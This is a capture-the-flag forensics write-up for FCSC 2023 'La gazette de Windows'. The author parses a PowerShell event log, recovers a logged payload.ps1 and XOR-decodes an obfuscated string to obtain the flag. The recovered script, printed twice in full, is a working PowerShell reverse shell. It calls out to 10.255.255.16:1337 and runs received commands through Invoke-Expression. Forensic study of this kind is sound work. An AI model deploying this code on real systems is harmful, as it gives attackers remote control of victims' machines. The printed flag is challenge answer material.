categories writeups articles whoami

Contents

FCSC 2023 - La gazette de Windows

ZarKyo included in writeups fcsc-2023
   828 words   4 minutes 
/fcsc-2023/fcsc-logo.png
Contents

La gazette de Windows

Category : Intro - forensics

States

It seems that a user is running suspicious Powershell scripts on his machine. Fortunately this machine is logged and we were able to recover the Powershell event log. Find what was sent to the attacker.

SHA256(Microsoft-Windows-PowerShell%4Operational.evtx) = 770b92f7c98ffb708c3e364753ee4bb569ccc810dd5891cbaf1363c2063ddd78

Solve

Check the integrity of the log file :

1
2
3

sha256sum Microsoft-Windows-PowerShell4Operational.evtx | grep 770b92f7c98ffb708c3e364753ee4bb569ccc810dd5891cbaf1363c2063ddd78

770b92f7c98ffb708c3e364753ee4bb569ccc810dd5891cbaf1363c2063ddd78  Microsoft-Windows-PowerShell4Operational.evtx

We will use the evtx tool to parse the .evtx :

1

./evtx_dump -o json Microsoft-Windows-PowerShell4Operational.evtx > powershell.json

We know that powershell scripts have been executed, so we will look for them :

1
2
3
4
5

cat powershell.json| grep -i ".ps1"               
      "ScriptBlockText": "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\jmichel\\Downloads\\payload.ps1'"
      "Path": "C:\\Users\\jmichel\\Downloads\\payload.ps1",
      "Path": "C:\\Users\\jmichel\\Downloads\\payload.ps1",
      "Path": "C:\\Users\\jmichel\\Downloads\\payload.ps1",

At record 1108, the payload.ps1 script is executed :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

Record 1108
{
  "Event": {
    "#attributes": {
      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
    },
    "EventData": {
      "MessageNumber": 1,
      "MessageTotal": 1,
      "Path": "",
      "ScriptBlockId": "dcb325dd-1c30-46bd-8363-81083ac85323",
      "ScriptBlockText": "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\jmichel\\Downloads\\payload.ps1'"
    },

At record 1109, we notice that powershell from the payload.ps1 script is executed :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

Record 1109
{
  "Event": {
    "#attributes": {
      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
    },
    "EventData": {
      "MessageNumber": 1,
      "MessageTotal": 1,
      "Path": "C:\\Users\\jmichel\\Downloads\\payload.ps1",
      "ScriptBlockId": "634cf5ca-b06b-4b5a-8354-c5ccd9d3c82a",
      "ScriptBlockText": "do {\r\n    Start-Sleep -Seconds 1\r\n     try{\r\n        $TCPClient = New-Object Net.Sockets.TCPClient('10.255.255.16', 1337)\r\n    } catch {}\r\n} until ($TCPClient.Connected)\r\n$NetworkStream = $TCPClient.GetStream()\r\n$StreamWriter = New-Object IO.StreamWriter($NetworkStream)\r\nfunction WriteToStream ($String) {\r\n    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}\r\n    $StreamWriter.Write($String + 'SHELL> ')\r\n    $StreamWriter.Flush()\r\n}\r\n$l = 0x46, 0x42, 0x51, 0x40, 0x7F, 0x3C, 0x3E, 0x64, 0x31, 0x31, 0x6E, 0x32, 0x34, 0x68, 0x3B, 0x6E, 0x25, 0x25, 0x24, 0x77, 0x77, 0x73, 0x20, 0x75, 0x29, 0x7C, 0x7B, 0x2D, 0x79, 0x29, 0x29, 0x29, 0x10, 0x13, 0x1B, 0x14, 0x16, 0x40, 0x47, 0x16, 0x4B, 0x4C, 0x13, 0x4A, 0x48, 0x1A, 0x1C, 0x19, 0x2, 0x5, 0x4, 0x7, 0x2, 0x5, 0x2, 0x0, 0xD, 0xA, 0x59, 0xF, 0x5A, 0xA, 0x7, 0x5D, 0x73, 0x20, 0x20, 0x27, 0x77, 0x38, 0x4B, 0x4D\r\n$s = \"\"\r\nfor ($i = 0; $i -lt 72; $i++) {\r\n    $s += [char]([int]$l[$i] -bxor $i)\r\n}\r\nWriteToStream $s\r\nwhile(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {\r\n    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)\r\n    $Output = try {\r\n            Invoke-Expression $Command 2>&1 | Out-String\r\n        } catch {\r\n            $_ | Out-String\r\n        }\r\n    WriteToStream ($Output)\r\n}\r\n$StreamWriter.Close()"
    },
  }
}

We reformat the powershell for more readability :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

do {
    Start-Sleep -Seconds 1
    try {
        $TCPClient = New-Object Net.Sockets.TCPClient('10.255.255.16', 1337)
    }
    catch {
        # Silently catch exception
    }
} until ($TCPClient.Connected)

$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)

function WriteToStream ($String) {
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | $ {0}
    $StreamWriter.Write($String + 'SHELL> ')
    $StreamWriter.Flush()
}

$l = 0x46, 0x42, 0x51, 0x40, 0x7F, 0x3C, 0x3E, 0x64, 0x31, 0x31, 0x6E, 0x32, 0x34, 0x68, 0x3B, 0x6E, 0x25, 0x25, 0x24, 0x77, 0x77, 0x73, 0x20, 0x75, 0x29, 0x7C, 0x7B, 0x2D, 0x79, 0x29, 0x29, 0x29, 0x10, 0x13, 0x1B, 0x14, 0x16, 0x40, 0x47, 0x16, 0x4B, 0x4C, 0x13, 0x4A, 0x48, 0x1A, 0x1C, 0x19, 0x2, 0x5, 0x4, 0x7, 0x2, 0x5, 0x2, 0x0, 0xD, 0xA, 0x59, 0xF, 0x5A, 0xA, 0x7, 0x5D, 0x73, 0x20, 0x20, 0x27, 0x77, 0x38, 0x4B, 0x4D

$s = ""
for ($i = 0; $i -lt 72; $i++) {
    $s += [char]([int]$l[$i] -bxor $i)
}

WriteToStream $s

while (($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
    $Output = try {
        Invoke-Expression $Command 2>&1 | Out-String
    }
    catch {
        $_ | Out-String
    }
    WriteToStream $Output
}

$StreamWriter.Close()

This PowerShell code connects to a remote server at IP address 10.255.255.16 on port 1337 using TCP protocol. Once the connection is established, the code sends an encrypted character string to the remote server, which is decrypted by the server. Then the code waits for commands from the user and executes them on the remote server.

Here we have an XOR of $l. After the execution of the for loop, the $s will contain a character string resulting from the XOR operation between each element of the list $l and its position in the list. Here is the value of $s :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

$l = 0x46, 0x42, 0x51, 0x40, 0x7F, 0x3C, 0x3E, 0x64, 0x31, 0x31, 0x6E, 0x32, 0x34, 0x68, 0x3B, 0x6E, 0x25, 0x25, 0x24, 0x77, 0x77, 0x73, 0x20, 0x75, 0x29, 0x7C, 0x7B, 0x2D, 0x79, 0x29, 0x29, 0x29, 0x10, 0x13, 0x1B, 0x14, 0x16, 0x40, 0x47, 0x16, 0x4B, 0x4C, 0x13, 0x4A, 0x48, 0x1A, 0x1C, 0x19, 0x2, 0x5, 0x4, 0x7, 0x2, 0x5, 0x2, 0x0, 0xD, 0xA, 0x59, 0xF, 0x5A, 0xA, 0x7, 0x5D, 0x73, 0x20, 0x20, 0x27, 0x77, 0x38, 0x4B, 0x4D

$s = ""
for ($i = 0; $i -lt 72; $i++) {
    $s += [char]([int]$l[$i] -bxor $i)
}

Write-Output $s

FCSC{98c98d98e5a546dcf6b1ea6e47602972ea1ce9ad7262464604753c4f79b3abd3}

Flag : FCSC{98c98d98e5a546dcf6b1ea6e47602972ea1ce9ad7262464604753c4f79b3abd3}

Updated on Apr 30, 2023
Read Markdown
 FCSCFORENSIC
Back | Home